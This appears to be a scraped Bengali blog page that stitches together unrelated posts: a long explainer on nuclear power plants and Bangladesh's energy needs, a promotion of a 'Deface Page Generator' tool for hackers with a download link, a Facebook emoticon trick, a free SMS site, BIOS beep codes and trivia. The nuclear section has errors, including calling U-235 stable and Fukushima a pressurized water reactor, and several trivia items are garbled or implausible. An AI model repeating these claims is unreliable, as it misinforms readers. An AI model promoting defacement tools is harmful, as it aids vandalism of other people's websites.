তাপবিদ্যুৎ কেন্দ্রে জ্বালানি পুড়িয়ে তাপ উৎপাদনের ব্যবস্থা করা হয়। জীবাশ্ম জ্বালানি কেন্দ্রগুলোতে কয়লা, তেল বা প্রাকৃতিক গ্যাস ব্যবহৃত হয়। পারমাণবিক বিদ্যুৎ কেন্দ্রে পারমাণবিক চুল্লিতে (Nuclear Reactor) তেজস্ক্রিয় আইসোটেপের দহনে তাপ উৎপন্ন হয়। উৎপন্ন তাপ বয়লার সিস্টেমের মাধ্যমে পানিকে বাষ্পীভূত করে। উৎপাদিত বাষ্প স্টিম টারবাইনকে সক্রিয় করে। টারবাইনের সঙ্গে যুক্ত অলটারনেটর (এক ধরনের জেনারেটর) বিদ্যুৎ উৎপাদন করে। অলটারনেটরের একটি বিশেষ অংশ মোটর, ইজ্ঞিন বা অন্য কোনো উপায়ে ঘোরালে পরিবর্তী বৈদ্যুতিক ভোল্টেজ (alternating current) সৃষ্টি হয়। এই ব্যবস্থা যান্ত্রিক শক্তিকে বৈদ্যুতিক শক্তিতে রূপাণ্তরিত করে।
প্রচলিত অর্থে নিওক্লিয়ার পাওয়ার বা কেন্দ্রীণ ক্ষমতা হলো পারমাণবিক চুল্লিতে কেন্দ্রীণ বিভাজন থেকে প্রাপ্ত শক্তির ব্যবহার। এই তাপ শক্তি দিয়ে পানিকে বাষ্পে পরিণত করা হয়। বিভাজন বিক্রিয়া (Fission) ঘটে ভারি পরমাণুর কেন্দ্রীণ ভাঙ্গনের ফলে এবং তার ফলে যে শক্তি অবমুক্ত হয় তা রাসায়নিক বিক্রিয়া থেকে প্রাপ্ত শক্তির দশলক্ষ গুণ বেশি যেখানে শুধু জ্বালানি পোড়ানো হয়।
আমরা জানি প্রত্যেক পদার্থ পরমাণু নামক অসংখ্য অতি ক্ষুদ্র কণা দ্বারা গঠিত। সব মৌলের পরমাণুতে থাকে ইলেকট্টন, প্রোটন এবং নিউট্রন – এই তিনটি মূল কণিকা। নিউট্রন ও প্রোটন পরমাণুর কেন্দ্র নিউক্লিয়াসে অবস্থান করে। ইলেকট্রন নিউক্লিয়াসের বাইরে অবস্থান করে। পরমাণু সামগ্রিকভাবে কোনরূপ চার্জযুক্ত থাকে না। যেহেতু নিউট্রন চার্জবিহীন, সেহেতু পরমাণুতে ইলেকট্রন ও প্রোটনের সংখ্যা অবশ্যই সমান হবে। কেননা, প্রোটন ও ইলেকট্রনের আধান বিপরীতধর্মী ও সমপরিমাণের।

c atom e এক নজরে পারমাণবিক বিদ্যুৎ কেন্দ্র

একই মৌলের বিভিন্ন পরমাণুর কয়েক প্রকারের ভর হতে পারে। (ভর = প্রোটন ও নিউট্রনের সর্বমোট সংখ্যা) যে সব পরমাণুর প্রোটন সংখ্যা সমান কিন্তু ভর সংখ্যা ভিন্ন হয়, সে সব পরমাণুকে পরস্পরের আইসোটোপ বলা হয়। অর্থাৎ নিউট্রনের সংখ্যার তারতম্যের জন্যই আইসোটপের সৃষ্টি। একই মৌলের সব আইসোটপের ভৌত ও রাসায়নিক ধর্ম একই থাকে। কোন কোন পরমাণুতে পারমাণবিক কেন্দ্রীণের অস্থায়িত্ব থেকে যে প্রতিভাসের সৃষ্টি হয় তার নাম তেজস্ক্রীয়তা। এই অস্থায়িত্বেরকালে কেন্দ্রীণ এক স্বতঃস্ফুর্ত রূপান্তরের বা পরিবর্তনের মধ্যে পরে যায় এবং এর ফলে বিকিরণ নিঃসৃত হয়। ইউরেনিয়াম, থোরিয়াম, প্লুটুনিয়াম ইত্যাদি তেজস্ক্রিয় পদার্থ। এতক্ষণ যা আলাপ করলাম তার উদ্দ্যেশ্য পারমাণবিক বিদ্যুৎ কেন্দ্রের জটিল প্রক্রিয়াকে বুঝতে সবার জন্য যেন সহজ হয়। এখন আসল কথায় ফিরে আসি।
পরমাণুর নিউক্লিয়াসকে ভেঙ্গে বা বিভাজন করে যে শক্তি পাওয়া যায় তাকে পারমাণবিক শক্তি বলে। ১৯০৫ সালে বিজ্ঞানী আলবার্ট আইনস্টাইন প্রমাণ করেন যে, পদার্থ ও শক্তি প্রকৃতপক্ষে অভিন্ন অর্থাৎ পদার্থকে শক্তিতে রূপান্তরিত করা যায় এবং শক্তিকে রূপান্তরিত করা যায় পদার্থতে। m ভরবিশিষ্ট কোন পদার্থকে শক্তিতে রূপান্তরিত করলে যে শক্তি উৎপন্ন হয় তার পরিমাণ E=mc² এখানে c=আলোকের বেগ = 300,000 km/sec.
ফিশানের (Fission) শাব্দিক অর্থ বিভাজন। একটি ভারী পরমাণুকে দ্রুতগামী নিউট্রন দ্বারা ভেঙ্গে হালকা ভারের একাধিক পরমাণু ও শক্তি উৎপন্ন করার প্রক্রিয়াকে কাজে লাগানো হয় পারমাণবিক বিদ্যুৎ কেন্দ্রে (Nuclear Power Plant)। যে সকল তেজস্ক্রিয় পদার্থ এই ফিশন বিক্রিয়ায় অংশ নেয় তাদের ফিসাইল পদার্থ বা পারমাণবিক জ্বালানী বলা হয়। পারমাণবিক বিদ্যুৎ কেন্দ্রে জ্বালানী হিসেবে ব্যবহার হয় ইউরেনিয়াম-২৩৫ আইসোটোপ। মজার ব্যাপার হচ্ছে তেজস্ক্রিয় কিছু আইসোটোপ আছে যেগুলো বিশেষ অবস্থায় নিজেরাই নিজেদের পরমাণুকে ভেঙ্গে তাপশক্তি বিকিরণ করে।
Uranium-235(92+143)একটি সুস্থিত (stable) তেজস্ক্রিয় পদার্থ যার প্রতিটি পরমাণুর নিউক্লিয়াসে ৯২টি প্রোটন ও ১৪৩টি নিউট্রন আছে। ইহার পরমাণুতে বাহির থেকে একটি নিউট্রন ঢুকিয়ে দিলে তখন এটি ইউরেনিয়ামের অস্থিত (unstable) আইসোটোপ Uranium-236 -এ পরিণত হবে। এই আইসোটোপটি নিজের অস্তিত্ব বেশিক্ষণ ধরে রাখতে পারে না। তাই এর পরমাণুটি ভেঙ্গে দুটি সুস্থির (stable) পরমাণুতে (Krypton and Barium) পরিণত হবে। ভেঙ্গে যাওয়ার প্রাক্কালে পরমাণুটি প্রচুর তাপশক্তি উৎপন্ন করে দুটি অতিরিক্ত নিউট্রনকে মুক্ত করে দেবে। মুক্ত নিউট্রন দু’টি আবার ইউরেনিয়ামের নতুন দু’টি পরমাণুকে ভেঙ্গে প্রচুর তাপশক্তি উৎপন্ন করে চারটি নিউট্রনকে মুক্ত করে দেবে।
u fission এক নজরে পারমাণবিক বিদ্যুৎ কেন্দ্র
এইভাবে চলতে থাকবে যতক্ষণ পর্যন্ত ইউরেনিয়াম-২৩৫ এর অস্তিত্ব থাকবে। এই ধরণের রাসায়নিক বিক্রিয়াকে বলা হয় চেইন রিয়েকশন। চেইন রিয়েকশনকে নিয়ন্ত্রণে রাখতে না পারলে তাপশক্তি বৃদ্ধি পেয়ে ভয়াবহ বিপর্যয়ের সৃষ্টি করে। যেমন নিউক্লিয়ার বোমা। পারমাণবিক বিদ্যুৎ কেন্দ্রের চুল্লীতে (Reactor) ইউরেনিয়ামের রডগুলো বিশেষভাবে সজ্জিত থাকে। চুল্লীগুলো বিভিন্ন ধাপে খুব শক্ত ও প্রশস্ত কংক্রিট দিয়ে তৈরি করা হয় যাতে তেজস্ক্রিয়তা বাহিরে আসতে না পারে। ফিশনের পরিমাণ তথা চেইন রিয়েকশনকে নিয়ন্ত্রণের জন্য Cadmium দিয়ে নির্মিত নিয়ন্ত্রক রড/পাইপ ব্যবহার করা হয়। কারণ Cadmium মুক্ত নিউট্রনকে সহজেই চুষে নেয়। চুল্লীর তাপমাত্রাকে কমাতে বা একটি নির্দিষ্ট মাত্রায় ধরে রাখতে নিয়ন্ত্রক পাইপ দিয়ে ইউরোনিয়াম রডকে ঢেকে দেওয়া হয়। আর সম্পূর্ণ রিয়েক্টরের তাপমাত্রা নিয়ন্ত্রণ করতে ব্যবহার করা হয় পানি। রিয়েক্টরের তাপে এই পানি বাষ্পে পরিণত হয়। এই বাষ্প দিয়েই টারবাইনের সাহায্যে জেনারেটর চালিয়ে বিদ্যুৎ উৎপন্ন হয়। টারবাইনে ব্যবহারের পর এই বাষ্পকে কুলিং টাওয়ারের মাধ্যমে পানিতে পরিণত করে আবার রিয়েক্টরে ফেরত পাঠানো হয়। প্রয়োজনে অতিরিক্ত বাষ্প চিমনি দিয়ে বের করে দেওয়া হয় ও নতুন পানি বাহির থেকে সরবরাহ করা হয়। চুল্লীর মধ্যে পার্শ্বপ্রতিক্রিয়ায় যেসব তেজস্ক্রিয় পার্টিকেল প্রস্তুত হয় তারমধ্যে Deuterium ও tritium অন্যতম। এগুলো পানির হাইড্রোজেন পরমাণুর সাথে নিউট্রন যুক্ত হয়ে সৃষ্টি হয়।
কোন কারণে রিয়েক্টর বন্ধ করে দিলেও কয়েকদিন পর্যন্ত রিয়েক্টরের ভেতর উচ্চ তাপমাত্রা থাকে। কারণ পারমাণবিক বিক্রিয়া হঠাৎ করে সম্পূর্ণ থামিয়ে দেয়া যায় না। তাই রিয়েক্টর বন্ধ করে দিলেও ডিজেল জেনারেটর অথবা ব্যক আপ জেনারেটর দিয়ে পাম্প চালিয়ে রিয়েক্টরে পানির প্রবাহ সচল রাখা হয়। ডিজেল জেনারেটর কাজ না করলে ব্যাটারি ব্যাবহার করে পাম্প সচল রাখারও ব্যবস্থা আছে। এই পানির প্রবাহ যদি কোন ভাবে বন্ধ হয়ে যায়, তবে রিয়েক্টরের তাপমাত্রা কোনভাবেই নিয়ন্ত্রণ করা যাবে না, ফলে ভয়াবহ বিস্ফোরণ ঘটবে। উল্লেখ্য, সাম্প্রতিক কালে (18 March, 2011) জাপানের ফুকুশিমা পারমাণবিক চুল্লি একই সাথে প্রচন্ড ভূমিকম্প ও সুনামির আঘাতে মারাত্নকভাবে ক্ষতিগ্রস্থের কারণে বিকল্প পাম্পগুলো নষ্ট হয়ে যাওয়ায় চুল্লিতে পানি সরবরাহ সচল রাখা সম্ভব হয়নি। যার ফলে অতিরিক্ত তাপমাত্রার কারণে বিস্ফোরণ ঘটে।
পানির ব্যবহারের তারতম্যের উপর ভিত্তি করে পারমাণবিক বিদ্যুৎ কেন্দ্রকে দুইভাগে ভাগ করা যায়: Pressurized Water Reactor ও Boiling Water Reactor।
১) Pressurized Water Reactor (PWR):
400px PressurizedWaterReactor এক নজরে পারমাণবিক বিদ্যুৎ কেন্দ্র
এখানে পানিকে বিশেষভাবে চাপের মধ্যে রাখা হয়, ফলে পানি খুবই গরম হবে কিন্তু ফুটবে না বা বাষ্পে পরিণত হবে না। এই super heat পানিকে একটি তাপ পরিবাহী পাইপের মধ্যে দিয়ে চালনা করা হয়। পাইপটির অংশ বিশেষ স্টীম জেনারেটর বা হিট চেইঞ্জারের মধ্যে প্রবেশ করনো থাকে। বাহির থেকে সরবরাহকৃত পানি স্টীম জেনারেটরে এসে সুপার হিট পানির তাপ শোষন করে বাষ্পে পরিণত হয়। এই বাষ্প টারবাইনকে সচল করে কনডেনসর/কুলিং টাওয়ারে এসে পানিতে পরিণত হয়ে আবার চুল্লীতে একই প্রক্রিয়ায় ফিরে যায়। সুবিধা: চুল্লীর তেজস্ক্রিয় পানি বাহিরে আসতে পারে না। অসুবিধা: পানিকে চাপে রাখার জন্য আলাদা শক্তি প্রয়োগের প্রয়োজন হয়। জাপানের ফুকুশিমায় বিপর্যস্ত বিদ্যুৎ কেন্দ্রটি ছিল এধরনের Pressurized Water Reactor।
২) Boiling Water Reactor (BWR):
student bwr এক নজরে পারমাণবিক বিদ্যুৎ কেন্দ্র
এখানে চুল্লীতে চেইন রিয়েকশনের তাপে পানি সরাসরি বাষ্পে পরিণত হয়। এই তেজস্ক্রিয় বাষ্প চুল্লীর বাহিরে এসে টারবাইনকে সচল করে কনডেনসর/কুলিং টাওয়ারে পানিতে পরিণত হয়ে আবার চুল্লীতে ফিরে যায়। অসুবিধা: চুল্লীর তেজস্ক্রিয় পানি বাহিরে আসায় সহজে তেজস্ক্রিয়তা ছড়ানোর সম্ভাবনা থাকে। সুবিধা: পানিকে চাপে রাখার জন্য আলাদা শক্তি প্রয়োগের প্রয়োজন হয় না।
মেল্টডাউন: রিয়েক্টরের তাপমাত্রা নিয়ন্ত্রণে রাখতে না পারলে ফুয়েল রড তথা ইউরেনিয়াম রড গুলো গলে গিয়ে রিয়েক্টরের মেঝেতে তেজস্ক্রিয় জ্বালানী ছড়িয়ে পড়তে পারে। রিয়েক্টরের মেঝে ২২০০ ডিগ্রি ফারেনহাইট তাপমাত্রা পর্যন্ত সহ্য করতে পারে। কিন্তু অনিয়ন্ত্রিত পারমাণবিক বিক্রিয়ার (চেইন রিয়েকশন) ফলে তাপমাত্রা ৪০০০ ডিগ্রি ফারেনহাইট ছাড়িয়ে যেতে পারে। ফলে রিয়েক্টরের মেঝে গলে গিয়ে তেজস্ক্রিয় পদার্থ মাটির নীচে চলে যাবে এবং ভূগর্ভস্থ পানির প্রবাহের সাথে মিশে যাবে। দৈনন্দিন ব্যবহার্য পানি প্রত্যক্ষ বা পরোক্ষভাবে মাটির নীচ থেকে সংগ্রহ করা হয়, সেক্ষেত্রে ভয়াবহ বিপর্যয়ের সম্ভাবনা থাকে। এছাড়া রিয়েক্টরের তেজস্ক্রিয় বাষ্প বাতাসের অক্সিজেন ও হাইড্রোজেনের সংস্পর্শে এসে বিস্ফোরণ ঘটায়।
পারমাণবিক বিদ্যুৎ কেন্দ্রের সুফল: গ্রীনহাউস এফেক্ট বা গ্লোবাল ওর্য়ামিংয়ের মত কোন সাইট এফেক্ট এখানে নেই। The World Nuclear Association -এর মতে বর্তমান বিশ্বে যে পরিমাণ বিদ্যুৎ পারমাণবিক কেন্দ্রে উৎপন্ন হয় তা কয়লা দিয়ে উৎপন্ন করতে প্রতি বৎসর বায়ুমন্ডলে 2.6 বিলিয়ন টন কার্বন-ডাই অক্সাইড যোগ হত। এক পাউন্ড ইউরোনিয়াম দিয়ে যে পরিমাণ বিদুৎ উৎপাদন করা সম্ভব তা কয়লা দিয়ে উৎপাদন করতে ৩ মিলিয়ন পাউন্ড কয়লার প্রয়োজন। পারমাণবিক রিয়েক্টরের বিদ্যুৎ উৎপাদন ক্ষমতা অনেক বেশি ও বিদ্যুৎ উৎপাদন খরচও কম। যেসব দেশে গ্যাস, তেল, কয়লা ইত্যাদি খনিজ সম্পদ নেই তাদেরকে বিদ্যুৎ উৎপাদনের জন্য বিদেশের উপর নির্ভর করতে হয় না।
পারমাণবিক বিদ্যুৎ কেন্দ্রের কুফল: একটি পারমাণবিক শক্তির চুল্লি স্থাপনের পূর্বে অঞ্চলের পরিবেশ, ভূ-কম্পন প্রবনতা, হাইড্রোলজি, আবহাওয়াবিদ্যা, জনসংখ্যা এবং শিল্প-পরিবহন ও সামরিক স্থাপনাসমূহ নিয়ে গভীরভাবে চিন্তা করতে হয়। এছাড়া অগ্নিকান্ড, বিস্ফোরণ, বিকিরণ, ও দুর্ঘটনার কারণে মহাবিপর্যয় ঘটতে পারে। পারমাণবিক বিদ্যুৎকেন্দ্রের রক্ষণাবেক্ষণে আন্তর্জাতিক মানের নিউক্লিয়ার বিশেষজ্ঞ প্রয়োজন। পারমাণবিক বিদ্যুৎ চুল্লির দুর্ঘটনার ফলে ক্যান্সারজনিত রোগের সংক্রমণ ভয়াবহ আকার ধারণ করে। যেসব স্থানে এ ধরনের দুর্ঘটনা ঘটে সেসব স্থানে জন্ম নেয়া সকল শিশুই শারীরিক প্রতিবন্ধীকতার শিকার হয়, জমির উর্বরতা চিরদিনের জন্য বিনষ্ট হয়। পারমাণবিক চুল্লিতে রাসায়নিক বিক্রিয়ার পর সৃষ্টি হয় তেজস্ক্রিয় বর্জ্য যা জীবজগত ও পরিবেশের জন্য মারাত্মক বিপদজনক। এসব বর্জ্য কমপক্ষে ১০,০০০ বছর বিশেষভাবে সংরক্ষণ করতে হয় যেন তেজস্ক্রিয়তা ছড়াতে না পারে। যতই নিরাপত্তা ব্যবস্থা গ্রহণ করা হউক না কেন তারপরেও প্রাকৃতিক বিপর্যয় ও কারিগরি ত্রুটির কারণে দুর্ঘটনার সম্ভাবনা কমবেশি থেকে যায়। কোন দেশ বা জাতিকে বিপন্ন করার জন্য আন্তর্জাতিক সন্ত্রাসীরা সে দেশের পারমাণবিক চুল্লিতে হামলা চালাতে পারে। এছাড়া পারমাণবিক চুল্লির প্রযুক্তি ও ইউরেনিয়াম দিয়ে পারমাণবিক মারণাস্ত্র তৈরির সম্ভাবনা থাকে। পারমাণবিক চুল্লির শক্তির উৎস হচ্ছে অপ্রতুল ও দুর্লভ মৌল ইউরেনিয়াম। বিজ্ঞানীদের ধারণা বর্তমানে যে হারে ব্যবহার হচ্ছে তাতে আগামী ৪০ থেকে ৬০ বৎসর পর ইউরেনিয়াম আর পাওয়া যাবে না। পারমাণবিক চুল্লি নির্মান খুবই ব্যয়বহুল ব্যাপার।
বিশ্বের মোট উৎপাদিত বিদ্যুতের ১৬% আসে পারমাণবিক বিদ্যুৎ কেন্দ্র থেকে। বিশ্বের ৩১টি দেশের ৪৪০টি পারমাণবিক চুল্লিতে এই বিদ্যুৎ উৎপাদিত হচ্ছে। যুক্তরাষ্ট্রের একাই রয়েছে ১০৪টি রিয়েক্টর যেখানে উৎপাদন হয় তাদের ২০% বিদ্যুৎ। ফ্রান্সের ৫৯টি রিয়েক্টর সেদেশের মোট উৎপাদনের ৭৮% বিদ্যুৎ উৎপাদন করে। বর্তমানে যেসব দেশে আরো রিয়েক্টর নির্র্মানাধীন রয়েছে তারমধ্যে শীর্ষে রয়েছে চীন ও ভারত। ভারতে বর্তমানে ২০টি পরমাণু চুল্লি রয়েছে। যারা একটি বাদে সব ক’টি চালু রয়েছে। বর্তমানে ভারতের মাত্র ৩ শতাংশ চাহিদা মেটে পরমাণু বিদু্ৎতে। এই উৎপাদন ২০২০ সালের মধ্যে বাড়িয়ে ৬ শতাংশ ও ২০৩০ সালে ১৩ শতাংশ করার পরিকল্পনা রয়েছে ভারতের কেন্দ্রীয় সরকারের।
International Nuclear and Radiological Event Scale (INES): পারমাণবিক বিদ্যুৎ কেন্দ্রে দুর্ঘটনার কারণে সৃষ্ট ক্ষয়ক্ষতি ও সম্ভাব্য বিপর্যয়কে পরিমাপ করার জন্য যে স্কেল ব্যবহার হয় তাকে সংক্ষেপে INES স্কেল বলা হয়। এর প্রণেতা হচ্ছে International Atomic Energy Agency (IAEA)।
Zobair7 1301359029 2 ines এক নজরে পারমাণবিক বিদ্যুৎ কেন্দ্র
ক্ষয়ক্ষতি ও বিপদমাত্রার পরিমানকে এই স্কেলে সাত ভাগে ভাগ করা হয়েছে। স্কেলের ধাপগুলোকে লগারিদম পদ্ধতিতে বাড়ানো হয়েছে, অর্থাৎ ক্ষয়ক্ষতি ও বিপদমাত্রার পরিমান প্রতি ধাপে দশ গুণ করে বাড়ে। উল্লেখ্য ১৯৮৬ সালের ইউক্রেনে চেরনোবিল দুর্ঘটনাকে স্কেলের সর্বোচ্চ ৭ নম্বর মহা বিপর্যয়, ১৯৫৭ সালে রাশিয়ায় মায়াক দুর্ঘটনাকে ৬ নম্বর বিপর্যয়, সাম্প্রতিক কালে জাপানের ফুকোশিমা পারমাণবিক বিদ্যুৎ কেন্দ্রের দুর্ঘটনাকে ৫ নম্বর বিপর্যয় এবং ১৯৮০ সালে ফ্রান্সের সেন্ট লরেন্ট দূর্ঘটনাকে ৪ নম্বর পর্যায়ের বিপর্যয় হিসেবে চিহ্নিত করা হয়েছে।
বাংলাদেশের প্রেক্ষাপটে পারমাণবিক বিদ্যুৎ কেন্দ্র: আমাদের দেশের অন্যতম প্রধান সমস্যাগুলোর মধ্যে একটি বিদ্যুৎ সমস্যা। এটি এখন আর নতুন করে বলার প্রয়োজন পড়ে না। বিদ্যুতের অভাবে কলকারখানা বন্ধ হয়ে যাচ্ছে, মানুষের জীবন দূর্বিষহ হয়ে উঠেছে, স্কুল-কলেজ-অফিস-আদালত থেকে শুরু করে হাসপাতালের মত জরুরী প্রতিষ্টানগুলোও তাদের স্বাভাবিক কাজকর্ম চালিয়ে যেতে পারছে না। গ্যাস ও কয়লার অভাবে তাপবিদ্যুৎ কেন্দ্রগুলো বিদ্যুৎ উৎপাদন করতে পারছে না। অথচ নাগরিক জীবনে বিদ্যুতের চাহিদা দিনদিন বাড়ছে। এছাড়া দেশের অর্থনীতিকে সচল রাখার জন্য বিদ্যুতের গুরুত্ব অপরিসীম। সারা দুনিয়াজুড়েই যে জাতি যতো বেশি বিদ্যুৎ উৎপাদন ও ব্যবহার করতে পারে সে জাতি ততো বেশি উন্নত বলে স্বীকৃতি রয়েছে। আজকের বিশ্বের ধনী দেশগুলো বেশিরভাগ পারমাণবিক চুল্লি নির্মান করেছিল ৬০ ও ৭০ -এর দশকে। পৃথিবীর সবচেয়ে ভূমিকম্পপ্রবণ দেশ জাপান এটম বোমার আগুণে দগ্ধ হয়েও চরম ঝুঁকি নিয়ে ১৯৬০ সালে পারমাণবিক চুল্লি নির্মান করে। অর্থাৎ আজকের ধনী বিশ্বের অর্থনৈতিক উন্নয়নের সাথে পারমাণবিক বিদ্যুৎ কেন্দ্র অতপ্রোতভাবে জড়িত। চীন ও ভারতের মত দ্রুত উন্নয়নশীল দেশগুলো তাদের অর্থনীতির চাকাকে আরো বেগবান করার জন্য উন্নত দেশের রক্তচক্ষুকে উপেক্ষা করে বিপদের সম্ভাবনা থাকা স্বত্বেও আরো অধিক পারমাণবিক বিদ্যুৎ কেন্দ্র স্থাপনের উদ্যোগ নিয়েছে। অথচ বিদ্যুতের অভাবে আমাদের দেশের অর্থনীতির নড়বড়ে চাকা প্রায় থেমে যাওয়ার উপক্রম হয়েছে। এমতাবস্থায় আমাদের বিদ্যুৎ সমস্যা সমাধানে পারমাণবিক বিদ্যুৎ কেন্দ্র ছাড়া অন্য কোন বিকল্প নেই। বিশেষ করে বাংলাদেশ ঘণবসতিপূর্ণ এলাকা হওয়ায় বিপদের ঝুঁকি কিছুটা বেশি। তারপরেও সর্বোচ্চ নিরাপত্তা সহকারে উদ্যোগ নেওয়া উচিত। সুখের বিষয়, আওয়ামী লীগ নেতৃত্বাধীন মহাজোট সরকার পাবনার রূপপুরে ৬০০ থেকে ১০০০ মেগাওয়াট বিদ্যুৎ উৎপাদনের লক্ষ্যে রাশিয়ার সহায়তায় পারমাণবিক বিদ্যুৎকেন্দ্র স্থাপনে মহাপরিকল্পনা গ্রহণ করেছে। পৃথিবীজুড়ে এখন নবায়নযোগ্য সৌরশক্তির ব্যবহারের প্রতিযোগীতা শুরু হয়েছে। তবে তা এখনো সীমিত পর্যায়ে। সোলার এনার্জিকে সহজলভ্য করে এবং তা দিয়ে অধিক পরিমাণে বিদ্যুৎ উৎপাদনের বিকল্প ব্যবস্থা সৃষ্টি না হওয়া পর্যন্ত ভয়াবহ বিদ্যুৎ সমস্যাকে সহনীয় পর্যায়ে রাখার জন্য আপাতত পারমাণবিক বিদ্যুৎ কেন্দ্র দিয়ে কিছুটা হলেও কাজ চালিয়ে যাওয়াই বুদ্ধিমানের কাজ।

দারুন সব ডিফেস পেজ তৈরির জন্য নিন দারুন একটি টুল !

হ্যাকার দের জন্য ডিফেস পেজ তৈরি খুব ই প্রয়োজনীয় ব্যাপার। আপনার এই কাজ টি সহজ করতে পারে মাত্র ১ এমবি এর একটি সফটওয়ার ।সফটওয়্যার এর নামঃ Deface Page Generator V1.0
স্ক্রিন শটঃ
Capture3 দারুন সব ডিফেস পেজ তৈরির জন্য নিন দারুন একটি টুল !

খুব সহজে  তৈরি করতে পারবেন আপনার কাংখিত ডিফেস পেজ ।
সব গুলো বক্স পূরণ করুন আপনার ইনফো দিয়ে। তার পর জেনারেট বাটন এ ক্লিক করুন ।
উপরে প্রিভিউ বাটন থেকে প্রিভিউ ও দেখে নিতে পারেন ।  তৈরি হয়ে যাবে আপনার কাংখিত ডিফেস পেজ।

Download From Here 

আপনি কিভাবে বড় বড় facebook chat Emoticons কোড তৌরি করবেন ?

Facebook চেনেনা এমন মানুষ এখন নেই বললেই চলে । আর Facebook এ chat করেনা এমন Facebook ব্যবহার কারিও কম । আর  chat এর সময় আমরা অনেক কিছু Emoticon এর ছবি ব্যবহার করে থাকি । এই Emoticon ব্যবহার করাব সময় যথাযথ Emoticon না পেলে তখন কি করবেন ? Emoticon নিয়ে আর চিন্তা নয় । আপনি নিজেই তৌরি করুন আপনার প্রিয় যে কোন ছবির Emoticon code । এই লিম্কে যেয়ে  অথবা https://apps.facebook.com/big-emo-creator/ ঠিকানায় যেয়ে আপনার পছন্দের ছবি upload করুন । মাত্র ১ মিনিট আপেক্ষা করুন । তারপর আপনাকে একটি code দেওয়া হবে । এটি কপি করে chat box এ পেষ্ট করুন । তৌরি হয়েগেল আপনার পছন্দের বড় আকারের  Emoticon ।




কোন প্রকার বিঞ্জাপন ছাড়াই বাংলাদেশী সাইট থেকে বিশ্বের যেকোন নাম্বারে আনলিমিটেড ফ্রি এস.এম.এস সেন্ড করুন

আপনারা বিভিন্ন সাইট থেকে ফ্রি এস.এম.এস সেন্ড করেন ।
সেসব সাইট থেকে এস.এম.এস সেন্ড করলে দেখা যায় যে অধিকাংশ সাইটই আপনার ম্যাসেজ এর সাথে তাদের সাইটের নাম লিখে দেয় ।
যা চরম বিরক্তিকর বিষয় ।
এজন্য এখন আমি আপনাদের একটি বাংলাদেশী সাইটের সঙ্গে পরিচয় করিয়ে দেব, এই সাইট থেকে এস.এম.এস সেন্ড করলে আপনি যতটুকু ম্যাসেজ লিখবেন সুধুমাত্র ততটুকু ম্যাসেজই recever পাবে ।ম্যাসেজ এর সাথে সাইটের নাম বা অন্য কোন বিঞ্জাপন থাকবে না ।
এছাড়া ফ্রি এস.এস.এস সেন্ড করতে কোন রেজিষ্ট্রেশনও করতে হবে না ।
শুধুমাত্র [এখানে ভিজিট] করুন, এরপর যাকে এস.এস.এস সেন্ড করবেন তার নাম্বার ও আপনার ম্যাসেজটি লিখে সেন্ড বাটনে ক্লিক করুন ।
আপনার এস.এস.এস টি ১০ সেকেন্ড এর মধ্যে সেন্ড হয়ে যাবে ।
.
[বিদ্রঃ যদি sms sending failed লিখা আসে তাহলে আবার সেন্ড । এস.এস.এস ১০১% সেন্ড হবে ।

বীপ শব্দ শোনা গেলে কম্পিউটার আপনাকে কী করতে বলে দেখে নিন

মাঝে মধ্যে কম্পিউটার থেকে “বীপ বীপ” এই জাতীয় শব্দ শুনতে পাই আমরাএই “বীপ বীপ” শব্দ শোনা গেলে কম্পিউটার সাহেব আমাদের কী করতে বলে …………………..
কম্পিউটারে পাওয়ার সুইচ চালু করার পর কিছু ইনডিকেটিং বীপ(মৃদু শব্দ) দিয়ে থাকে, যার দ্বারা আপনি কম্পিউটারের কিছু বিষয়,সমস্যা বুঝে নিতে পারেন………………………..জেনে নিন কোন বীপ দিয়ে সাধারনত কি বোঝানো হয়………………..
*১টি বীপ: কেসিয়ের অভ্যন্তরীন হার্ডওয়্যারের সকল যন্ত্রাংশ সঠিকভাবে সংযুক্ত আছে।কম্পিউটার চালু হতে সমস্যা হলে হার্ডডিস্ক ড্রাইভ,সিডি রম ড্রাইভ ও মনিটরের সংযোগ চেক করুন………………..
*২,৩ ও ৪ টি বীপ:  কম্পিউটার চালু হতে সমস্যা হলে ram সঠিকভাবে স্লটে লাগানো আছে কি না খেয়াল করুন।প্রয়োজনে র‌্যামটি খুলে আবার লাগান………………….
*৫টি বীপ: কম্পিউটার চালু হতে সমস্যা হলে মাদারবোর্ডের সকল কার্ড যথাযথভাবে সংযুক্ত আছে কি না খেয়াল করুন…………………..
*৬টি বীপ: মাদারবোর্ডের সাথে  কিবোর্ড সঠিকভাবে সংযুক্ত আছে কি না খেয়াল করুন………………
*৭টি বীপ: কম্পিউটার চালু হতে সমস্যা হলে প্রসেসরের সংযোগ যথাযথভাবে কাজ করছে কি না খেয়াল করুন…………………
*৮টি বীপ: ভিডিও যথাযথভাবে কাজ না করলে অথবা ভিডিওকার্ডের সংযোগে সমস্যা হলে সাধারনত ৮টি বীপ শোনা যায়।
*৯টি বীপ:এটি সাধারনত দেখা যায় না।এটি দিয়ে সাধারনত মাদারবোর্ডের বায়োসের গুরুতর সমস্যা বোঝানো হয়…………………..
*১০টি কিংবা তার বেশি বীপ: এটি দিয়ে সাধারনত মাদারবোর্ডের CMOS Chip অকার্যকর বোঝানো হয়……………………

কিছু অজানা তথ্য জেনে নিন

(১) ইন্টারনেট ব্যবহারকারীদের শতকরা ৮৬,৬ শতাংশই প্রতি সপ্তাহে গড়ে ছয় ঘন্টারবেশি অনলাইনে থাকেন।
(২) ১৯৯৫ সালের ১৪ সেপ্টেম্বরর আগ পযন্ত ডোমেইন রেজিস্ট্রে শন ছিল পুরোপুরি ফ্রি। এরপর থেকেই যুক্তরাস্ট্রের ন্যাশনাল সায়েন্স ফাউন্ডেশন টাকায় নিনিময়ে রেজিস্ট্রেশনের সিদ্দান্ত নেয় ।
(৩) বিশ্বের বুকে এ পযন্ত সবচেয়েবড় যে বরফের টুকরোটি পড়েছিল সেটি ছিল ৬ মিটার লম্বা। ১৮৪৯ সালে স্কটল্যান্ডে এটি ঘটেছিল ।
(৪) জানেন কি, সুর্যালোকের চাইতে১০ লক্ষ গুন তীব্র লেজার রশ্নি তৈরি করাও এখন মানুষের পক্ষে সম্ভব?
(৫)সাগর মহাসাগরের তলদেশে যতসোনা পড়ে আছে তা যদি উত্তোলন করে বিস্বের সব মানুযের মধ্যে বিলিয়ে দেয়া হয় তাহলে প্রতিটি মানুষের ভাগে পড়বে ২০কেজি করে সোনা ।
(৬) ঘন্টায় ২৭ হাজার কিলোমিটার পযন্ত গতিবেগ তুলতে মহাশুন্যযা নের সময় লাগে মাত্র ৮ মিটার ।
